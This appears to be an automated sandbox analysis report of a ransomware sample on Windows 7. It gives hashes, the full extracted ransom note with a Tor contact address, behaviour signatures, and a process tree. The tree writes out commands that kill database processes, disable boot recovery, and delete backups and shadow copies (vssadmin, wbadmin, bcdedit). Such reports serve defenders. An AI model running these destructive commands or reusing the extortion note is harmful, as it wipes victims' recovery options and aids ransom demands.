Analysis

  • max time kernel
    151s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64 arch:x86 image:win7-20230831-en locale:en-us os:windows7-x64 system
  • submitted
    13-10-2023 14:03

General

  • Target

    IN.exe

  • Size

    340KB

  • MD5

    714870c33ba84e744b84b32e6e114ed9

  • SHA1

    840f442d4466713becdf72b88846871330ac38e7

  • SHA256

    51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51

  • SHA512

    270c584cc9f696de3421429627a07bfbd7829a033cfdc16280e7e233e8ae09e2f1cd0341537a6b050811683d93a14a1465aa3ab96e9577c98ebea521faae65f2

  • SSDEEP

    6144:PNs9prB0CnszdPZxMzk1ukSXa9bnuDOeFdGpBP7ENf3zcfUE:y9RaPZxMzk1uBXa9bu2JeAfUE

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">{{IDENTIFIER}}</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br> * Note that this server is available via Tor browser only<br><br> Follow the instructions to open the link:<br> 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.<br> 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.<br> 3. Now you have Tor browser. In the Tor Browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. Start a chat and follow the further instructions. <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (7545) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    PID:1288
      • C:\Users\Admin\AppData\Local\Temp\IN.exe
        "C:\Users\Admin\AppData\Local\Temp\IN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:2080
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2424
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
                4⤵
                PID:1212
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2228
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2800
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im sqlbrowser.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2272
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2736
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2720
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im sql writer.exe
                    5⤵
                    • Kills process with taskkill
                    PID:2680
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2668
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2540
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im sqlserv.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1584
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2564
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2512
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im msmdsrv.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2532
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2592
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3064
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im MsDtsSrvr.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2576
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            PID:2500
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
                4⤵
                PID:2504
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im sqlceip.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1396
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
            3⤵
            PID:2964
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
                4⤵
                PID:852
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdlauncher.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2708
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
            3⤵
            PID:2844
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                4⤵
                PID:1704
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im Ssms.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1672
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
            PID:1420
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                4⤵
                PID:2924
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im SQLAGENT.EXE
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2820
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
            3⤵
            PID:524
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                4⤵
                PID:268
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdhost.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:472
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
            3⤵
            PID:1708
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                4⤵
                PID:1380
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im ReportingServicesService.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1164
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
            3⤵
            PID:2332
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                4⤵
                PID:2904
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im msftesql.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2944
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
            3⤵
            PID:1240
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                4⤵
                PID:584
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im pg_ctl.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1060
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
            3⤵
            PID:1720
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                4⤵
                PID:1752
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -impostgres.exe
                    5⤵
                    • Kills process with taskkill
                    PID:2092
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
            3⤵
            PID:2140
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                4⤵
                PID:2060
                  • C:\Windows\system32\net.exe
                    net stop MSSQLServerADHelper100
                    5⤵
                    PID:1676
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop MSSQLServerADHelper100
                        6⤵
                        PID:1464
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
            3⤵
            PID:1460
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                4⤵
                PID:548
                  • C:\Windows\system32\net.exe
                    net stop MSSQL$ISARS
                    5⤵
                    PID:2164
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop MSSQL$ISARS
                        6⤵
                        PID:1816
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
            3⤵
            PID:1048
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                4⤵
                PID:2024
                  • C:\Windows\system32\net.exe
                    net stop MSSQL$MSFW
                    5⤵
                    PID:240
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop MSSQL$MSFW
                        6⤵
                        PID:396
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
            3⤵
            PID:1528
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                4⤵
                PID:2112
                  • C:\Windows\system32\net.exe
                    net stop SQLAgent$ISARS
                    5⤵
                    PID:2280
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop SQLAgent$ISARS
                        6⤵
                        PID:704
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
            3⤵
            PID:2408
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                4⤵
                PID:1820
                  • C:\Windows\system32\net.exe
                    net stop SQLAgent$MSFW
                    5⤵
                    PID:1700
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop SQLAgent$MSFW
                        6⤵
                        PID:1556
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
            3⤵
            PID:1552
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                4⤵
                PID:1760
                  • C:\Windows\system32\net.exe
                    net stop SQLBrowser
                    5⤵
                    PID:1236
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop SQLBrowser
                        6⤵
                        PID:1624
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
            3⤵
            PID:944
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                4⤵
                PID:2344
                  • C:\Windows\system32\net.exe
                    net stop REportServer$ISARS
                    5⤵
                    PID:804
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop REportServer$ISARS
                        6⤵
                        PID:1952
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
            3⤵
            PID:812
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                4⤵
                PID:2104
                  • C:\Windows\system32\net.exe
                    net stop SQLWriter
                    5⤵
                    PID:1568
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop SQLWriter
                        6⤵
                        PID:580
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
            3⤵
            PID:2220
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                4⤵
                PID:2476
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1136
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
            3⤵
            PID:2292
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                4⤵
                                                                                                                          PID:2444
                                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                                            bcdedit.exe /set {default} recoverynabled No
                                                                                                                            5⤵
                                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                                            PID:1652
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                        3⤵
                                                                                                                          PID:1936
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                            4⤵
                                                                                                                              PID:2796
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                            3⤵
                                                                                                                              PID:1944
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                                4⤵
                                                                                                                                  PID:2016
                                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                                    wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                                    5⤵
                                                                                                                                      PID:2368
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                  3⤵
                                                                                                                                    PID:1744
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                      4⤵
                                                                                                                                        PID:1604
                                                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                                                          wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                          5⤵
                                                                                                                                          • Deletes System State backups
                                                                                                                                          PID:2688
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                      3⤵
                                                                                                                                        PID:2300
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                          4⤵
                                                                                                                                            PID:308
                                                                                                                                            • C:\Windows\system32\wbadmin.exe
                                                                                                                                              wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                              5⤵
                                                                                                                                              • Deletes system backups
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              PID:2236
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                          3⤵
                                                                                                                                            PID:692
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                              4⤵
                                                                                                                                                PID:1068
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                                  5⤵
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:1392
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IN.exe
                                                                                                                                            \\?\C:\Users\Admin\AppData\Local\Temp\IN.exe -network
                                                                                                                                            2⤵
                                                                                                                                            • Adds Run key to start application
                                                                                                                                            • System policy modification
                                                                                                                                            PID:1956
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3004
                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2036

Network

MITRE ATT&CK Enterprise v15

Downloads


                                                                                                                                          298b331a4bedf95b9ae820bab7b725bf

                                                                                                                                          SHA1

                                                                                                                                          b337737e414e64ddc769c711fbd799e7b753101f

                                                                                                                                          SHA256

                                                                                                                                          04c94f091a76d9bd6f3e11e4b470b406bf869e0faacec6bd17b23e3d98c12eb1

                                                                                                                                          SHA512

                                                                                                                                          39835c013fc4a4d70952d8deaf8cd72620b63c95ad6264825f57c031af2e2fc707b658d1bf19d01f9bb2d2f33731eb5ae4d4a725198ff4edd5e3d3c1916a702e

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          1c2ee5973c818179bc21bafc176e3761

                                                                                                                                          SHA1

                                                                                                                                          3d8314b49a086e9fc9e8568559f1cd717cc8b27f

                                                                                                                                          SHA256

                                                                                                                                          0382392299a83d6ea07ca6489e476c1b815205526b3c2ca5a2242dafc82d0894

                                                                                                                                          SHA512

                                                                                                                                          4ef8adca9c8d62769c0b6a9a484e6d40e00c14039e0c4917b2c28005a13c10b8419a6bf439cd444427216d0acd838947acf09e5ecdb86898d429245ce1817fcf

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          1494cf5a46c3b23c878c83b893996c69

                                                                                                                                          SHA1

                                                                                                                                          c8594f5616850211b0dc7e82f61bafc68ddd8c66

                                                                                                                                          SHA256

                                                                                                                                          19aabf582755ff74cb224181cb3a98a9e165988c52cdcc7a082ad9e1c1114ed2

                                                                                                                                          SHA512

                                                                                                                                          87b5736b2a20ccb6a6674e3a5f147b772b29f771812b366163ccfba97b53f90e0def2c6ea07e113a34abb2821058d268089e2358e03144f82d0e75f3d498af88

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          44a9cc4ffebc99661110c0360bb12689

                                                                                                                                          SHA1

                                                                                                                                          ff5b2bc603ffed12dcc0bb4d09b522facbf05bbd

                                                                                                                                          SHA256

                                                                                                                                          f9eece11843f46998288065810be7616d94fc2ee60f20a6a34a18a394e41fcb6

                                                                                                                                          SHA512

                                                                                                                                          5dea24a4e8be13436ac7e6a3816fd6dfaa8e9c8ffc9b535ef0090068457c8c61ae6698b287b2b8558f5b5b3f2e891943cb1b8d66cd7da8893ec1440f888b7e9f

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          7fc541e2a356cd8678f82a60639806b0

                                                                                                                                          SHA1

                                                                                                                                          22ffa7a0820d470ccd1e87e0cbe26cb2a41cb5f3

                                                                                                                                          SHA256

                                                                                                                                          a6040349a1b7a277124aa5453ce06c4798c3a58935d1917163448f2513a08cd2

                                                                                                                                          SHA512

                                                                                                                                          771c11f5e9e34a14a712a52f05a570d20325001b61d50edb9abb6011fba96ad3153ed47b5cee89f082f01317db27259fc43a67564371c8dfb770b4ac0ac1d3c2

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          fcf3f8a2371b904a59c97ea9dead60dc

                                                                                                                                          SHA1

                                                                                                                                          3f4b5bafcf9828fa0868ac5585e09c34c5d15edf

                                                                                                                                          SHA256

                                                                                                                                          35e8d4b8cd4feea2f59d1e59136af420f2fa76f42921386bb9724a5fdc8db7a4

                                                                                                                                          SHA512

                                                                                                                                          0b3e7910971cd554968e77aef5cbe8f13c1eed7e119006c0527f0fe7505b088abb7a1538ccdcc47caa5635533d4d926abdbbdccde9c8a5c9d551c256fe18d063

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          62fb1064fb64cefa9dca22b72c3fece8

                                                                                                                                          SHA1

                                                                                                                                          b2a15396fad1b0e66619c489dc1a2d8acfbc75a1

                                                                                                                                          SHA256

                                                                                                                                          abbbe84bfe5e950d7ead24c05971db38ce244104516063f955139d913142c6c3

                                                                                                                                          SHA512

                                                                                                                                          84080f9f88734267a6de986be9bac34ec26f5fa95e15be35abeedcbf42ede93bc9b92a23dbd8fb5dbf48ef681410b818860f9d8b275736c87e777b866db00944

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          1bd9b2dca6ae4e42aa530412f69d939f

                                                                                                                                          SHA1

                                                                                                                                          0b814377543d1a8aa275a6898089b2b317f034d1

                                                                                                                                          SHA256

                                                                                                                                          ffaeea56c18720a34a424777a69555be2a94ca808809e94a8deee75ad88f98b5

                                                                                                                                          SHA512

                                                                                                                                          dc462ae055600dd931df6c581e8319e8e49ef01f29bfeeb40b790c313532c69a7783c8b3aef2cbbf9831122a6817dbb3eafe6702209384057b056b541c963772

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          6d131195bab3b0e3764a6aae52447352

                                                                                                                                          SHA1

                                                                                                                                          8dba474586c2c2687d23dd7f4bcfd4ef42694a54

                                                                                                                                          SHA256

                                                                                                                                          fbbe5c7e7f8d78f8347d797c81a569817c4c81bcc6eea4a925d0f3f6a6b2336f

                                                                                                                                          SHA512

                                                                                                                                          6625daf5723045994fd57fe2ce98877c3ffcaf75a36c162f4a5bedd5041d07a65e4bb350f8056e9ea67cd2bf2cf4a9ebc37d89d6bc17f6f2bc548da5698a0c5b

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          fc4f28bad2232367757ee1ce93572bd9

                                                                                                                                          SHA1

